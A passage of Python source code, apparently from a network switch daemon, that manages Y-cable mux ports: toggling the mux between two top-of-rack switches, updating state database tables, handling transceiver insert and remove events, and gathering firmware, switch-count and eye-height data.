helper_logger.log_warning(
"Error: Could not toggle the mux for port {} to torA write eeprom failed".format(physical_port))
return -1
def y_cable_toggle_mux_torB(physical_port):
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None:
helper_logger.log_error("Error: Could not get port instance for read side for Y cable port {} {}".format(physical_port, threading.currentThread().getName()))
return -1
try:
update_status = port_instance.toggle_mux_to_tor_b()
except Exception as e:
update_status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {} {}".format(physical_port,repr(e), threading.currentThread().getName()))
helper_logger.log_debug("Y_CABLE_DEBUG: Status of toggling mux to ToR B for port {} {} {}".format(physical_port, update_status, threading.currentThread().getName()))
if update_status is True:
return 2
else:
helper_logger.log_warning(
"Error: Could not toggle the mux for port {} to torB write eeprom failed".format(physical_port))
return -1
def update_tor_active_side(read_side, state, logical_port_name, port_mapping):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
if int(read_side) == 1:
if state == "active":
return y_cable_toggle_mux_torA(physical_port)
elif state == "standby":
return y_cable_toggle_mux_torB(physical_port)
elif int(read_side) == 2:
if state == "active":
return y_cable_toggle_mux_torB(physical_port)
elif state == "standby":
return y_cable_toggle_mux_torA(physical_port)
# TODO: Should we confirm that the mux was indeed toggled?
else:
helper_logger.log_warning(
"Error: Could not establish presence for Y cable port {} while trying to toggle the mux".format(logical_port_name))
return -1
else:
# Y cable ports should always have
# one to one mapping of physical-to-logical
# This should not happen
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable table port {} while trying to toggle the mux".format(logical_port_name))
return -1
def update_appdb_port_mux_cable_response_table(logical_port_name, port_mapping, asic_index, appl_db, read_side):
status = None
y_cable_response_tbl = {}
y_cable_response_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "MUX_CABLE_RESPONSE_TABLE")
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None or port_instance == -1:
status = 'unknown'
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
helper_logger.log_error(
"Error: Could not get port instance to perform update appdb for read side for Y cable port {}".format(logical_port_name))
return
if read_side is None:
status = 'unknown'
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
helper_logger.log_warning(
"Error: Could not get read side to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))
return
active_side = None
try:
active_side = port_instance.get_mux_direction()
except Exception as e:
active_side = -1
helper_logger.log_warning("Failed to execute the get_mux_direction for port {} due to {}".format(physical_port,repr(e)))
if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0 :
status = 'unknown'
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
helper_logger.log_warning(
"Error: Could not get active side to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))
return
if read_side == active_side and (active_side == 1 or active_side == 2):
status = 'active'
elif read_side != active_side and (active_side == 1 or active_side == 2):
status = 'standby'
else:
status = 'unknown'
helper_logger.log_warning(
"Error: Could not get state to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))
helper_logger.log_debug("Y_CABLE_DEBUG: notifying a probe for port status {} {}".format(logical_port_name, status))
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
else:
status = 'unknown'
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
helper_logger.log_warning(
"Error: Could not establish presence for Y cable port {} while responding to command probe".format(logical_port_name))
else:
# Y cable ports should always have
# one to one mapping of physical-to-logical
# This should not happen
status = 'unknown'
update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {} while responding to command probe".format(logical_port_name))
def read_y_cable_and_update_statedb_port_tbl(logical_port_name, port_mapping, mux_config_tbl):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
logical_port_name)
read_side = None
active_side = None
status = None
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None or port_instance == -1:
read_side = active_side = -1
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
helper_logger.log_error(
"Error: Could not get port instance to perform read_y_cable update state db for read side for Y cable port {}".format(logical_port_name))
return
with y_cable_port_locks[physical_port]:
try:
read_side = port_instance.get_read_side()
except Exception as e:
read_side = None
helper_logger.log_warning("Failed to execute the get_read_side for port {} due to {}".format(physical_port,repr(e)))
if read_side is None or read_side < 0 or read_side == port_instance.EEPROM_ERROR:
read_side = active_side = -1
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
helper_logger.log_error(
"Error: Could not establish the read side for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
return
with y_cable_port_locks[physical_port]:
try:
active_side = port_instance.get_mux_direction()
except Exception as e:
active_side = None
helper_logger.log_warning("Failed to execute the get_mux_direction for port {} due to {}".format(physical_port,repr(e)))
if active_side is None or active_side not in y_cable_switch_state_values:
read_side = active_side = -1
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
helper_logger.log_error(
"Error: Could not establish the active side for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
return
if read_side == active_side and (active_side == 1 or active_side == 2):
status = 'active'
elif read_side != active_side and (active_side == 1 or active_side == 2):
status = 'standby'
else:
status = 'unknown'
helper_logger.log_warning(
"Error: Could not establish the active status for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, status, read_side, active_side, logical_port_name)
return
else:
read_side = active_side = -1
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
helper_logger.log_warning(
"Error: Could not establish presence for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
else:
# Y cable ports should always have
# one to one mapping of physical-to-logical
# This should not happen
read_side = active_side = -1
update_table_mux_status_for_statedb_port_tbl(
mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
def create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping):
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(
namespace)
state_db[asic_id] = daemon_base.db_connect(
"STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_INFO_TABLE)
# fill the newly found entry
read_y_cable_and_update_statedb_port_tbl(
logical_port_name, port_mapping, y_cable_tbl[asic_index])
def check_identifier_presence_and_update_mux_table_entry(state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence):
global y_cable_port_instances
global y_cable_port_locks
(status, fvs) = port_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_warning(
"Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
return
else:
# Convert list of tuples to a dictionary
mux_table_dict = dict(fvs)
if "state" in mux_table_dict:
val = mux_table_dict.get("state", None)
if val in ["active", "auto", "manual", "standby"]:
# import the module and load the port instance
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
port_info_dict = y_cable_wrapper_get_transceiver_info(
physical_port)
if port_info_dict is not None:
vendor = port_info_dict.get('manufacturer')
if vendor is None:
helper_logger.log_warning(
"Error: Unable to find Vendor name for Transceiver for Y-Cable initiation {}".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
model = port_info_dict.get('model')
if model is None:
helper_logger.log_warning(
"Error: Unable to find model name for Transceiver for Y-Cable initiation {}".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
vendor = format_mapping_identifier(vendor)
model = format_mapping_identifier(model)
module_dir = y_cable_vendor_mapping.mapping.get(vendor)
if module_dir is None:
helper_logger.log_warning(
"Error: Unable to find module dir name from vendor for Y-Cable initiation {}".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
module = module_dir.get(model)
if module is None:
helper_logger.log_warning(
"Error: Unable to find module name from model for Y-Cable initiation {}".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
attr_name = 'sonic_y_cable.' + module
try:
y_cable_attribute = getattr(import_module(attr_name), 'YCable')
except Exception as e:
helper_logger.log_warning("Failed to load the attr due to {}".format(repr(e)))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
if y_cable_attribute is None:
helper_logger.log_warning(
"Error: Unable to import attr name for Y-Cable initiation {}".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
y_cable_port_instances[physical_port] = y_cable_attribute(physical_port, helper_logger)
y_cable_port_locks[physical_port] = threading.Lock()
with y_cable_port_locks[physical_port]:
try:
vendor_name_api = y_cable_port_instances.get(physical_port).get_vendor()
except Exception as e:
helper_logger.log_warning("Failed to call the get_vendor API for port {} due to {}".format(physical_port,repr(e)))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
return
if format_mapping_identifier(vendor_name_api) != vendor:
y_cable_port_instances.pop(physical_port)
y_cable_port_locks.pop(physical_port)
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
helper_logger.log_warning("Error: Y Cable api does not work for {}, {} actual vendor name {}".format(
logical_port_name, vendor_name_api, vendor))
return
y_cable_asic_table = y_cable_tbl.get(
asic_index, None)
mux_asic_table = mux_tbl.get(asic_index, None)
static_mux_asic_table = static_tbl.get(
asic_index, None)
if y_cable_presence[0] is True and y_cable_asic_table is not None and mux_asic_table is not None and static_mux_asic_table is not None:
# fill in the newly found entry
read_y_cable_and_update_statedb_port_tbl(
logical_port_name, port_mapping, y_cable_tbl[asic_index])
post_port_mux_info_to_db(
logical_port_name, port_mapping, mux_tbl[asic_index])
post_port_mux_static_info_to_db(
logical_port_name, port_mapping, static_tbl[asic_index])
else:
# first create the state db y cable table and then fill in the entry
y_cable_presence[:] = [True]
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(
namespace)
state_db[asic_id] = daemon_base.db_connect(
"STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_INFO_TABLE)
# fill the newly found entry
read_y_cable_and_update_statedb_port_tbl(
logical_port_name, port_mapping, y_cable_tbl[asic_index])
post_port_mux_info_to_db(
logical_port_name, port_mapping, mux_tbl[asic_index])
post_port_mux_static_info_to_db(
logical_port_name, port_mapping, static_tbl[asic_index])
else:
helper_logger.log_warning(
"Error: Could not get transceiver info dict Y cable port {} while inserting entries".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
else:
helper_logger.log_warning(
"Error: Could not establish transceiver presence for a Y cable port {} while inserting entries".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
else:
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {} while inserting entries".format(logical_port_name))
create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
else:
helper_logger.log_warning(
"Could not retreive active or auto value for state kvp for {}, inside MUX_CABLE table".format(logical_port_name))
else:
helper_logger.log_warning(
"Could not retreive state value inside mux_info_dict for {}, inside MUX_CABLE table".format(logical_port_name))
def check_identifier_presence_and_delete_mux_table_entry(state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event):
y_cable_tbl = {}
static_tbl, mux_tbl = {}, {}
# if there is No Y cable do not do anything here
if y_cable_presence[0] is False:
return
(status, fvs) = port_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_warning(
"Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
return
else:
# Convert list of tuples to a dictionary
mux_table_dict = dict(fvs)
if "state" in mux_table_dict:
if y_cable_presence[0] is True:
# delete this entry in the y cable table found and update the delete event
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_id] = swsscommon.Table(state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_id] = swsscommon.Table(state_db[asic_id], MUX_CABLE_INFO_TABLE)
# fill the newly found entry
delete_port_from_y_cable_table(logical_port_name, y_cable_tbl[asic_index])
delete_port_from_y_cable_table(logical_port_name, static_tbl[asic_index])
delete_port_from_y_cable_table(logical_port_name, mux_tbl[asic_index])
delete_change_event[:] = [True]
# delete the y_cable instance
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
y_cable_port_instances.pop(physical_port)
y_cable_port_locks.pop(physical_port)
else:
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {} while delete entries".format(logical_port_name))
def init_ports_status_for_y_cable(platform_sfp, platform_chassis, y_cable_presence, port_mapping, stop_event=threading.Event()):
global y_cable_platform_sfputil
global y_cable_platform_chassis
global y_cable_port_instances
# Connect to CONFIG_DB and create port status table inside state_db
config_db, state_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
static_tbl, mux_tbl = {}, {}
port_table_keys = {}
xcvrd_log_tbl = {}
y_cable_platform_sfputil = platform_sfp
y_cable_platform_chassis = platform_chassis
fvs_updated = swsscommon.FieldValuePairs([('log_verbosity', 'notice')])
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
port_table_keys[asic_id] = port_tbl[asic_id].getKeys()
xcvrd_log_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "XCVRD_LOG")
xcvrd_log_tbl[asic_id].set("Y_CABLE", fvs_updated)
# Init PORT_STATUS table if ports are on Y cable
logical_port_list = port_mapping.logical_port_list
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = port_mapping.get_asic_id_for_logical_port(
logical_port_name)
if asic_index is None:
helper_logger.log_warning(
"Got invalid asic index for {}, ignored".format(logical_port_name))
continue
if logical_port_name in port_table_keys[asic_index]:
check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence)
else:
# This port does not exist in Port table of config but is present inside
# logical_ports after loading the port_mappings from port_config_file
# This should not happen
helper_logger.log_warning(
"Could not retreive port inside config_db PORT table {} for Y-Cable initiation".format(logical_port_name))
def change_ports_status_for_y_cable_change_event(logical_port_dict, port_mapping, y_cable_presence, stop_event=threading.Event()):
# Connect to CONFIG_DB and create port status table inside state_db
config_db, state_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
static_tbl, mux_tbl = {}, {}
port_table_keys = {}
delete_change_event = [False]
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
# Get the keys from PORT table inside config db to prepare check for mux_cable identifier
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
port_table_keys[asic_id] = port_tbl[asic_id].getKeys()
# Init PORT_STATUS table if ports are on Y cable and an event is received
for logical_port_name, value in logical_port_dict.items():
# Get the asic to which this port belongs
asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
helper_logger.log_warning(
"Got invalid asic index for {}, ignored".format(logical_port_name))
continue
if logical_port_name in port_table_keys[asic_index]:
if value == sfp_status_helper.SFP_STATUS_INSERTED:
helper_logger.log_info("Got SFP inserted event")
check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence)
elif value == sfp_status_helper.SFP_STATUS_REMOVED:
check_identifier_presence_and_delete_mux_table_entry(
state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event)
else:
try:
# Now that the value is in bitmap format, let's convert it to number
event_bits = int(value)
if sfp_status_helper.is_error_block_eeprom_reading(event_bits):
check_identifier_presence_and_delete_mux_table_entry(
state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event)
except:
pass
# SFP return unkown event, just ignore for now.
helper_logger.log_warning("Got unknown event {}, ignored".format(value))
continue
# If there was a delete event and y_cable_presence was true, reaccess the y_cable presence
if y_cable_presence[0] is True and delete_change_event[0] is True:
y_cable_presence[:] = [False]
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(
namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
y_cable_table_size = len(y_cable_tbl[asic_id].getKeys())
if y_cable_table_size > 0:
y_cable_presence[:] = [True]
break
def delete_ports_status_for_y_cable(port_mapping):
state_db, config_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
y_cable_tbl_keys = {}
static_tbl, mux_tbl = {}, {}
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
y_cable_tbl_keys[asic_id] = y_cable_tbl[asic_id].getKeys()
static_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_INFO_TABLE)
port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
# delete PORTS on Y cable table if ports on Y cable
logical_port_list = port_mapping.logical_port_list
for logical_port_name in logical_port_list:
# Get the asic to which this port belongs
asic_index = port_mapping.get_asic_id_for_logical_port(
logical_port_name)
if asic_index is None:
helper_logger.log_warning(
"Got invalid asic index for {}, ignored".format(logical_port_name))
if logical_port_name in y_cable_tbl_keys[asic_index]:
delete_port_from_y_cable_table(logical_port_name, y_cable_tbl[asic_index])
delete_port_from_y_cable_table(logical_port_name, static_tbl[asic_index])
delete_port_from_y_cable_table(logical_port_name, mux_tbl[asic_index])
# delete the y_cable port instance
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_port_instances.get(physical_port) is not None:
y_cable_port_instances.pop(physical_port)
y_cable_port_locks.pop(physical_port)
else:
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {} while deleting entries".format(logical_port_name))
def check_identifier_presence_and_update_mux_info_entry(state_db, mux_tbl, asic_index, logical_port_name, port_mapping):
# Get the namespaces in the platform
config_db, port_tbl = {}, {}
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
(status, fvs) = port_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_debug("Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
return
else:
# Convert list of tuples to a dictionary
mux_table_dict = dict(fvs)
if "state" in mux_table_dict:
val = mux_table_dict.get("state", None)
if val in ["active", "auto", "manual", "standby"]:
if mux_tbl.get(asic_index, None) is not None:
# fill in the newly found entry
post_port_mux_info_to_db(logical_port_name, port_mapping, mux_tbl[asic_index])
else:
# first create the state db y cable table and then fill in the entry
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
mux_tbl[asic_id] = swsscommon.Table(state_db[asic_id], MUX_CABLE_INFO_TABLE)
# fill the newly found entry
post_port_mux_info_to_db(logical_port_name, port_mapping, mux_tbl[asic_index])
else:
helper_logger.log_warning(
"Could not retreive active or auto value for state kvp for {}, inside MUX_CABLE table".format(logical_port_name))
def get_firmware_dict(physical_port, port_instance, target, side, mux_info_dict, logical_port_name):
result = {}
if port_instance.download_firmware_status == port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS:
# if there is a firmware download in progress, retreive the last known firmware
state_db, mux_tbl = {}, {}
mux_firmware_dict = {}
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
mux_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_INFO_TABLE)
asic_index = y_cable_platform_sfputil.get_asic_id_for_logical_port(
logical_port_name)
(status, fvs) = mux_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(logical_port_name, mux_tbl[asic_index].getTableName()))
mux_info_dict[("version_{}_active".format(side))] = "N/A"
mux_info_dict[("version_{}_inactive".format(side))] = "N/A"
mux_info_dict[("version_{}_next".format(side))] = "N/A"
return
mux_firmware_dict = dict(fvs)
mux_info_dict[("version_{}_active".format(side))] = mux_firmware_dict.get(("version_{}_active".format(side)), None)
mux_info_dict[("version_{}_inactive".format(side))] = mux_firmware_dict.get(("version_{}_inactive".format(side)), None)
mux_info_dict[("version_{}_next".format(side))] = mux_firmware_dict.get(("version_{}_next".format(side)), None)
helper_logger.log_warning(
"trying to get/post firmware info while download in progress returning with last known firmware without execute {}".format(physical_port))
return
elif port_instance.download_firmware_status == port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED:
# if there is a firmware download failed, retreive the current MCU's firmware with a log message
helper_logger.log_error(
"Firmware Download API failed in the previous run, firmware download status was set to failed;retry required {}".format(physical_port))
with y_cable_port_locks[physical_port]:
try:
result = port_instance.get_firmware_version(target)
except Exception as e:
result = None
helper_logger.log_warning("Failed to execute the get_firmware_version API for port {} side {} due to {}".format(physical_port,side,repr(e)))
if result is not None and isinstance(result, dict):
mux_info_dict[("version_{}_active".format(side))] = result.get("version_active", None)
mux_info_dict[("version_{}_inactive".format(side))] = result.get("version_inactive", None)
mux_info_dict[("version_{}_next".format(side))] = result.get("version_next", None)
else:
mux_info_dict[("version_{}_active".format(side))] = "N/A"
mux_info_dict[("version_{}_inactive".format(side))] = "N/A"
mux_info_dict[("version_{}_next".format(side))] = "N/A"
def get_muxcable_info(physical_port, logical_port_name, port_mapping):
mux_info_dict = {}
y_cable_tbl, state_db = {}, {}
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None:
helper_logger.log_error("Error: Could not get port instance for muxcable info for Y cable port {}".format(logical_port_name))
return -1
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
asic_index = port_mapping.get_asic_id_for_logical_port(
logical_port_name)
if asic_index is None:
helper_logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
return -1
(status, fvs) = y_cable_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(logical_port_name, y_cable_tbl[asic_index].getTableName()))
return -1
mux_port_dict = dict(fvs)
read_side = int(mux_port_dict.get("read_side"))
active_side = None
with y_cable_port_locks[physical_port]:
try:
active_side = port_instance.get_active_linked_tor_side()
except Exception as e:
helper_logger.log_warning("Failed to execute the get_active_side API for port {} due to {}".format(physical_port,repr(e)))
if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0:
tor_active = 'unknown'
elif read_side == active_side and (active_side == 1 or active_side == 2):
tor_active = 'active'
elif read_side != active_side and (active_side == 1 or active_side == 2):
tor_active = 'standby'
else:
tor_active = 'unknown'
mux_info_dict["tor_active"] = tor_active
mux_dir_val = None
with y_cable_port_locks[physical_port]:
try:
mux_dir_val = port_instance.get_mux_direction()
except Exception as e:
helper_logger.log_warning("Failed to execute the get_mux_direction API for port {} due to {}".format(physical_port,repr(e)))
if mux_dir_val is None or mux_dir_val == port_instance.EEPROM_ERROR or mux_dir_val < 0 or read_side == -1:
mux_direction = 'unknown'
else:
if read_side == mux_dir_val:
mux_direction = 'self'
else:
mux_direction = 'peer'
mux_info_dict["mux_direction"] = mux_direction
with y_cable_port_locks[physical_port]:
try:
manual_switch_cnt = port_instance.get_switch_count_total(port_instance.SWITCH_COUNT_MANUAL)
auto_switch_cnt = port_instance.get_switch_count_total(port_instance.SWITCH_COUNT_AUTO)
except Exception as e:
manual_switch_cnt = None
auto_switch_cnt = None
helper_logger.log_warning("Failed to execute the get_switch_cnt API for port {} due to {}".format(physical_port,repr(e)))
if manual_switch_cnt is None or manual_switch_cnt == port_instance.EEPROM_ERROR or manual_switch_cnt < 0:
mux_info_dict["manual_switch_count"] = "N/A"
else:
mux_info_dict["manual_switch_count"] = manual_switch_cnt
if auto_switch_cnt is None or auto_switch_cnt == port_instance.EEPROM_ERROR or auto_switch_cnt < 0:
mux_info_dict["auto_switch_count"] = "N/A"
else:
mux_info_dict["auto_switch_count"] = auto_switch_cnt
if read_side == 1:
with y_cable_port_locks[physical_port]:
try:
eye_result_self = port_instance.get_eye_heights(port_instance.TARGET_TOR_A)
eye_result_peer = port_instance.get_eye_heights(port_instance.TARGET_TOR_B)
except Exception as e:
eye_result_self = None
eye_result_peer = None
helper_logger.log_warning("Failed to execute the get_eye_heights API for port {} due to {}".format(physical_port,repr(e)))
else:
with y_cable_port_locks[physical_port]:
try:
eye_result_self = port_instance.get_eye_heights(port_instance.TARGET_TOR_B)
eye_result_peer = port_instance.get_eye_heights(port_instance.TARGET_TOR_A)
except Exception as e:
eye_result_self = None
eye_result_peer = None
helper_logger.log_warning("Failed to execute the get_eye_heights API for port {} due to {}".format(physical_port,repr(e)))
with y_cable_port_locks[physical_port]:
try:
eye_result_nic = port_instance.get_eye_heights(port_instance.TARGET_NIC)
except Exception as e:
eye_result_nic = None
helper_logger.log_warning("Failed to execute the get_eye_heights nic side API for port {} due to {}".format(physical_port,repr(e)))
if eye_result_self is not None and eye_result_self is not port_instance.EEPROM_ERROR and isinstance(eye_result_self, list):
mux_info_dict["self_eye_height_lane1"] = eye_result_self[0]
mux_info_dict["self_eye_height_lane2"] = eye_result_self[1]
else:
mux_info_dict["self_eye_height_lane1"] = "N/A"
mux_info_dict["self_eye_height_lane2"] = "N/A"
if eye_result_peer is not None and eye_result_peer is not port_instance.EEPROM_ERROR and isinstance(eye_result_peer, list):
mux_info_dict["peer_eye_height_lane1"] = eye_result_peer[0]
mux_info_dict["peer_eye_height_lane2"] = eye_result_peer[1]
else:
mux_info_dict["peer_eye_height_lane1"] = "N/A"
mux_info_dict["peer_eye_height_lane2"] = "N/A"
if eye_result_nic is not None and eye_result_nic is not port_instance.EEPROM_ERROR and isinstance(eye_result_nic, list):
mux_info_dict["nic_eye_height_lane1"] = eye_result_nic[0]
mux_info_dict["nic_eye_height_lane2"] = eye_result_nic[1]
else:
mux_info_dict["nic_eye_height_lane1"] = "N/A"
